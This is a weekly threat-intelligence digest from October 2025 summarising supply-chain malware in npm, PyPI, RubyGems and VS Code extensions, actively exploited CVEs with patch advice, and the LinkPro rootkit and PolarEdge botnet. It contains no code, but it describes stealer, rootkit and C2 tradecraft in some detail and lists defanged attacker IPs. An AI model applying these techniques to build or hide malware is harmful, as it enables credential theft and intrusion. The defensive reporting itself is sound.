10/23/2025-10/29/2025 10 npm Packages Caught Stealing Developer Credentials, Active Exploits Hit Dassault and XWiki, Magento Input Validation Vulnerability Exploited In Wild And More.

1. 10 npm Packages Caught Stealing Developer Credentials on Windows, macOS, and Linux

Cybersecurity researchers uncovered 10 typosquatted npm packages (uploaded July 4, 2025, ~9,900 total downloads) that install a multi-stage information stealer for Windows, Linux and macOS. The packages impersonated popular libraries (TypeScript, discord.js, ethers.js, nodemon, react-router-dom, zustand) and trigger a malicious postinstall hook that runs install.js, opens a new terminal window, and launches an obfuscated app.js. The payload shows a fake CAPTCHA and believable install output while fingerprinting victims by IP and fetching a 24 MB PyInstaller stealer from 195.133.79[.]43. app.js uses four layers of obfuscation (XOR, URL-encoding, hex/octal tricks) to resist analysis. The stealer extracts credentials, tokens, cookies, SSH keys and system keyring secrets (email, cloud sync, VPN, password managers), compresses them, and exfiltrates the archive — giving attackers direct access to corporate email, file storage, internal networks and production systems.

2. Active Exploits Hit Dassault and XWiki — CISA Confirms Critical Flaws Under Attack

Threat actors are actively exploiting severe flaws in Dassault Systèmes DELMIA Apriso and XWiki, according to CISA and VulnCheck alerts. The affected issues include CVE-2025-6204 (code injection, CVSS 8.0) and CVE-2025-6205 (missing authorization, CVSS 9.1) in DELMIA Apriso releases 2020–2025, both patched in August, and CVE-2025-24893 (eval injection, CVSS 9.8) in XWiki. CISA recently added these flaws to its Known Exploited Vulnerabilities catalog, following earlier exploitation of CVE-2025-5086 in the same product. VulnCheck observed in-the-wild attacks leveraging the XWiki flaw to deploy a cryptocurrency miner via a two-stage chain: the first stage drops a downloader (“x640”) from 193.32.208[.]24, and the second fetches payloads (“x521,” “x522”) that install and run the miner while terminating rivals. The activity, traced to a Vietnam-based IP (123.25.249[.]88), highlights ongoing exploitation. CISA urges immediate patching, with federal agencies required to remediate DELMIA Apriso flaws by November 18, 2025.

3. Windows Server Emergency Patches Fix WSUS Bug With PoC Exploit

Microsoft has issued out-of-band (OOB) security updates to fix CVE-2025-59287, a critical remote code execution flaw in Windows Server Update Services (WSUS). The vulnerability, now with public proof-of-concept exploit code, affects only Windows servers with the WSUS Server Role enabled. It allows remote, unauthenticated attackers to execute code with SYSTEM privileges via crafted events that trigger unsafe object deserialization, making it potentially wormable between WSUS servers. Microsoft urges admins to install the patches immediately for all supported Windows Server versions (2012–2025). Servers without the WSUS role are not affected, but enabling WSUS without patching exposes systems to attack. As a temporary workaround, admins can disable the WSUS role or block inbound traffic on ports 8530 and 8531, though this stops Windows endpoints from receiving updates. The cumulative OOB patch replaces prior updates, and Microsoft recommends rebooting servers after installation.

4. CISA Flags Critical Lanscope Bug

CISA has warned of a critical vulnerability (CVE-2025-61932, CVSS 9.3) in Motex Lanscope Endpoint Manager, urging all federal agencies to patch or mitigate affected systems by November 12, 2025. The flaw, confirmed by Motex through Japan’s JVN portal, allows remote code execution via specially crafted packets due to improper verification of communication sources. Exploitation could enable attackers to steal data, deploy ransomware, or compromise entire networks. The issue affects on-premises versions of Lanscope’s Client and Detection Agent. Motex has released fixes in versions 9.3.2.7–9.4.7.3; systems running 9.4.7.1 or earlier remain vulnerable. CISA advises organizations to upgrade immediately, restrict network access, enable zero-trust controls, and continuously monitor for anomalies. Because Lanscope manages privileged enterprise endpoints, unpatched systems present significant risk, underscoring the need for timely updates, strong access control, and layered cyber defenses.

5. Magento Input Validation Vulnerability Exploited In Wild To Hijack Session And Execute Malicious Codes

A critical flaw in Magento (Adobe Commerce), dubbed SessionReaper and tracked as CVE-2025-54236, allows attackers to hijack user sessions and execute remote code. First disclosed on September 9, 2025, the vulnerability gained urgency after Sansec released a proof-of-concept exploit on October 22, sparking mass exploitation attempts. Over 250 Magento stores were reportedly compromised as attackers targeted unpatched systems ahead of the holiday season. The flaw, rated CVSS 9.8, stems from improper input validation in Magento’s authentication process, enabling attackers to impersonate users, access admin panels, or upload malicious code to steal data and install backdoors. Akamai detected more than 300 probes within 48 hours of the exploit’s release, blocking attacks via its security engine. Experts warn that while web application firewalls help, the only reliable defense is applying Adobe’s latest patches immediately to prevent large-scale e-commerce breaches.

10/15/2025-10/22/2025 Self-Spreading ‘GlassWorm’, CISA Flags Critical Lanscope Bug, LinkPro Rootkit Attacking GNU/Linux Systems And More.

1. Self-Spreading ‘GlassWorm’ Infects VS Code Extensions in Widespread Supply Chain Attack

Cybersecurity researchers uncovered GlassWorm, a self-propagating worm hidden in VS Code extensions on the Open VSX Registry and the Microsoft Marketplace that targets developers. The campaign — the second major DevOps supply-chain worm since Shai-Hulud in mid-September 2025 — uses the Solana blockchain for resilient command-and-control with Google Calendar as a fallback, and hides malicious code using invisible Unicode variation selectors. GlassWorm steals npm, Open VSX, GitHub and Git credentials, drains funds from 49 crypto wallet extensions, deploys SOCKS proxies, installs hidden VNC servers, and weaponizes stolen credentials to compromise more packages. Fourteen extensions (13 on Open VSX, 1 on Microsoft) were infected, ~35,800 downloads, first wave on October 17, 2025; the hijack method is unknown. The malicious payload retrieves Base64 C2 instructions from Solana memos and Google Calendar events, then drops a JavaScript module (Zombi) that completes the takeover. Because VS Code extensions auto-update, attackers can push changes silently — researchers warn it’s a worm built to spread across the developer ecosystem.

2. CISA Flags Critical Lanscope Bug

CISA has issued an alert for a critical flaw (CVE-2025-61932) in Motex Lanscope Endpoint Manager, urging all federal agencies to patch or mitigate affected systems by November 12, 2025. Motex confirmed reports of malicious packets exploiting the vulnerability through Japan’s JVN portal.

The flaw, rated 9.3 on the CVSS v4 scale, affects on-premises Lanscope Client and Detection Agent components. It stems from improper source verification in communication channels, allowing remote attackers to execute arbitrary code via crafted packets—potentially leading to data theft, ransomware, or full network compromise.

Motex has released patches in versions 9.3.2.7–9.4.7.3; earlier builds remain vulnerable. CISA recommends upgrading immediately, restricting Lanscope network access, enabling continuous monitoring, and enforcing least privilege and MFA. Exploitation risks highlight the need for layered defenses, timely patching, and strong endpoint security to prevent large-scale enterprise compromise.

3. LinkPro Rootkit Attacking GNU/Linux Systems Using eBPF Module to Hide Malicious Activities

LinkPro is a sophisticated eBPF-based rootkit for GNU/Linux discovered during forensics on a compromised AWS environment. The intrusion began via an internet-exposed Jenkins server (CVE-2024-23897) and a malicious Docker image (kvlnt/vv) deployed across EKS clusters, enabling container escape and credential theft. Written in Go, LinkPro runs in two modes: a passive reverse mode that activates after a TCP “magic” packet and an active forward mode for direct C2. Its stealth uses two eBPF modules—Hide (intercepts getdents, sys_bpf, tracepoints and hides files/processes/eBPF programs) and Knock (XDP/TC programs that detect a TCP SYN with window 54321, store source IPs, and rewrite headers to tunnel traffic to port 2233); it falls back to /etc/ld.so.preload if needed. Persistence is achieved by masquerading as system-resolved via a fake systemd unit and planting a timestamped binary. LinkPro provides shell access, file ops, SOCKS5, and multi-protocol tunneling (HTTP/WebSocket/TCP/UDP/DNS) with XOR obfuscation. Monitor unusual systemd units and eBPF activity.

4. ExecutionPolarEdge Targets Cisco, ASUS, QNAP, Synology Routers in Expanding Botnet Campaign

Cybersecurity researchers have detailed PolarEdge, a botnet malware first identified by Sekoia in February 2025. Targeting routers from vendors like Cisco and Synology, its purpose remains unknown. Attackers have exploited a known Cisco flaw (CVE-2023-20118) to install the malware.

PolarEdge is a TLS-based backdoor. Its primary function is to send a host fingerprint to its command-and-control (C2) server and then listen for commands over a built-in TLS server. It supports two modes: a connect-back mode to download files and a debug mode to alter its configuration on-the-fly. However, its default mode is to act as a TLS server, parsing incoming requests with a custom protocol. If a specific “HasCommand” parameter is set, it executes the received command and returns the output.

The malware uses anti-analysis techniques, including process masquerading, and employs a mechanism to automatically relaunch itself if the main process ends. Although it does not ensure persistence across reboots, a child process checks every 30 seconds and restarts the backdoor if needed.

5. TARmageddon Flaw in Async-Tar Rust Library Could Enable Remote Code

Researchers uncovered CVE-2025-62518, a high-severity flaw (CVSS 8.1) in the async-tar Rust library and its forks, including tokio-tar, that can enable remote code execution (RCE) via file overwriting. Dubbed TARmageddon by Edera, the issue affects popular projects like testcontainers and wasmCloud. The bug stems from inconsistent handling of PAX and USTAR headers when parsing TAR files—if a PAX header specifies a valid size but the USTAR header lists zero, the parser misinterprets embedded data as new TAR entries. Attackers can exploit this to smuggle nested archives and overwrite critical files such as configuration or build scripts. Tokio-tar, last updated in July 2023, is considered abandonware; users should migrate to astral-tokio-tar v0.5.6, which fixes the issue. The flaw highlights that even memory-safe languages like Rust remain vulnerable to logic errors that can lead to severe security risks if left unpatched.

6. Five New Exploited Bugs Land in CISA’s Catalog — Oracle and Microsoft Among Targets

CISA added five flaws to its Known Exploited Vulnerabilities catalog, confirming that CVE-2025-61884—an SSRF in Oracle Configurator’s Runtime component—has been weaponized. Rated 7.5, the bug is remotely exploitable without authentication and could expose critical data. It’s the second actively exploited Oracle E-Business Suite defect alongside CVE-2025-61882 (9.8), which enables unauthenticated RCE; Google GTI and Mandiant reported dozens of affected organizations, and some activity may tie to Cl0p extortion operations.

CISA also listed four other issues: CVE-2025-33073 (Windows SMB Client privilege escalation, CVSS 8.8 — fixed June 2025), CVE-2025-2746 and CVE-2025-2747 (Kentico Xperience authentication bypasses, both 9.8 — fixed March 2025), and CVE-2022-48503 (Apple JavaScriptCore array-index validation, 8.8 — fixed July 2022). Exploitation details for those four remain sparse.

Federal Civilian Executive Branch agencies must remediate these KEV entries by November 10, 2025 to mitigate active threats.

10/08/2025-10/15/2025 npm, PyPI, and RubyGems Packages,Critical Vulnerabilities in NetWeaver, Hackers Exploit Auth Bypass in Service Finder WordPress Theme And More.

1. npm, PyPI, and RubyGems Packages Found Sending Developer Data to Discord Channels

Researchers found malicious packages on npm, PyPI and RubyGems that use Discord webhooks as a command-and-control channel to exfiltrate stolen data. Discord webhooks post to channels without authentication and are effectively write-only, so defenders can’t read previous posts from the URL. Examples include npm’s mysql-dumpdiscord (steals config/.env files), nodejs.discord (logs via webhook), PyPI packages malinssx/malicus/maliinn (trigger HTTP calls on pip install), and RubyGems’ sqlcommenter_rails (collects host files like /etc/passwd and sends them to a hard-coded webhook). By abusing free, fast webhooks and hiding in install-time hooks or build scripts, attackers can siphon .env files, API keys, credentials, and host details from developer machines and CI runners before runtime detection. The company also flagged 338 malicious npm packages tied to a North Korean “Contagious Interview” campaign that lures developers with fake job offers and booby-trapped repos, using typosquats to deliver stealers and backdoors like BeaverTail and InvisibleFerret.

2. SAP Patches Critical Vulnerabilities in NetWeaver, Print Service, SRM

SAP released 16 new and updated security notes in its October 2025 Patch Day, including three addressing critical vulnerabilities. The most severe, CVE-2025-42944 (CVSS 10.0), is an insecure deserialization flaw in NetWeaver AS Java. Originally patched in September, the new update adds JVM-wide filters (jdk.serialFilter) to block unsafe class deserialization. Another critical bug, CVE-2025-42937 (CVSS 9.8), is a directory traversal flaw in Print Service that could let unauthenticated attackers overwrite system files. SAP also fixed CVE-2025-42910 (CVSS 9.0), an unrestricted file upload vulnerability in Supplier Relationship Management (SRM) that may allow malware uploads. Two high-severity flaws were addressed in Commerce Cloud (DoS bug, CVE-2025-5115) and Data Hub Integration Suite (misconfiguration flaw, CVE-2025-48913). Ten additional notes fix medium- and low-severity issues across NetWeaver, S/4HANA, and other platforms. No active exploitation has been reported, but SAP urges prompt patching due to known targeting of its software.

3. Hackers Exploit Auth Bypass in Service Finder WordPress Theme

Hackers are actively exploiting a critical flaw (CVE-2025-5947, CVSS 9.8) in the Service Finder WordPress theme that lets them bypass authentication and log in as administrators. The bug, caused by improper validation of the original_user_id cookie in the service_finder_switch_back() function, affects versions 6.0 and earlier. With admin access, attackers can fully control a WordPress site, create accounts, upload PHP files, and export databases. Security firm Wordfence has recorded over 13,800 exploit attempts since August 1, with attack spikes exceeding 1,500 daily in late September. The flaw was discovered by researcher “Foxyyy” and patched by developer Aonetheme in version 6.1, released July 17. Most attacks come from five IPs, though new ones may appear. Administrators should review logs for suspicious activity or new accounts, block the listed IPs, and update immediately, as attackers can erase traces of compromise once they gain admin access.

4. 175 Malicious npm Packages with 26,000 Downloads Used in Credential Phishing Campaign

Researchers flagged 175 malicious npm packages (26,000 downloads) used in a phishing campaign dubbed Beamglea, targeting 135+ industrial, tech, and energy firms. The packages act as hosting for redirect scripts served via npm’s registry and unpkg.com CDN rather than executing malware on install. A script named redirect_generator.py programmatically publishes packages like redirect-xxxxxx, injecting victim emails and phishing URLs. Each package provides an HTML file that loads beamglea.js from UNPKG; that JavaScript redirects victims to credential-harvesting pages while pre-filling the email field, boosting success rates. Socket found over 630 such HTML files masquerading as purchase orders, specs, or project docs. Distribution likely relies on phishing emails that prompt recipients to open the crafted HTML. Attackers leverage free, trusted infrastructure (npm + UNPKG) to build resilient, low-cost phishing infrastructure, avoiding detection by not performing malicious actions during package install. The campaign underscores how legitimate platforms can be abused as hosting for targeted credential theft.
 

5. RMPocalypse: Single 8-Byte Write Shatters AMD’s SEV-SNP Confidential Computing

Chipmaker AMD has released fixes for a security flaw named “RMPocalypse,” which undermines the confidentiality guarantees of its Secure Encrypted Virtualization (SEV-SNP) technology. According to ETH Zürich researchers, the attack exploits incomplete protections, allowing a single malicious write to the Reverse Map Paging (RMP) table—a critical structure storing security metadata for all DRAM pages. The vulnerability (CVE-2025-0033, CVSS score 5.9) is a race condition occurring during the initialization of the RMP by the AMD Secure Processor (ASP/PSP). This permits a malicious hypervisor to manipulate the RMP’s initial content, compromising the memory integrity of SEV-SNP protected virtual machines. A compromised RMP voids all SEV-SNP integrity and confidentiality guarantees, enabling attackers to bypass isolation, forge attestations, and exfiltrate all secrets with a 100% success rate.

Impacted products include multiple AMD EPYC™ 7003, 8004, 9004, and 9005 series processors. While fixes are available for many, some embedded series updates are planned for November 2025. Microsoft and Supermicro are also addressing the flaw in their respective platforms. This incident highlights a critical catch-22 where the security mechanism itself was not fully protected during VM startup.